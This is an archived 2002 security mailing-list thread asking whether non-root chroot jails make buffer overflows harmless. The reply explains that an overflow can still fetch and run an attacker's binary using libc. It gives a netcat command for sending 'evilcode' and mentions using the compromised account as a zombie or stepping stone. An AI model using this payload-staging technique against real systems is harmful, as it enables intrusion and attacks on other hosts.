Vulnerability Development mailing list archives
Re: OT? Are chroots immune to buffer overflows?
From: "Adam Lydick" <lydickaw () hotmail com>
Date: Wed, 22 May 2002 13:26:44 -0400
Sure it can. Just have the bootstrap code (the overflow) download a binary from the attacker's machine:
'nc victim_machine portnum < evilcode'
Then exec the code. All the calls you need are in libc, which is almost certainly loaded by the overflowed program. You have a chrooted, local account that can still be used as a zombie for attacks or masking your true location... (Or as a stepping stone for attacking more powerful accounts / machines on the local network)
Adam
From: Jason Haar <Jason.Haar () trimble co nz>
To: vuln-dev () securityfocus com
Subject: OT? Are chroots immune to buffer overflows?
Date: Wed, 22 May 2002 15:48:16 +1200

[note: my question is WRT non-root chrooted jails - we all know about chroot'ing root processes!]

Most buffer overflows I've seen attempt to infiltrate the system enough to run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist - so they fail.

Is it as simple as that? As 99.999% of the system binaries aren't available in the jail, can a buffer overflow ever work?

--
Cheers

Jason Haar
Information Security Manager
Trimble Navigation Ltd.
Phone: +64 3 9635 377
Fax: +64 3 9635 417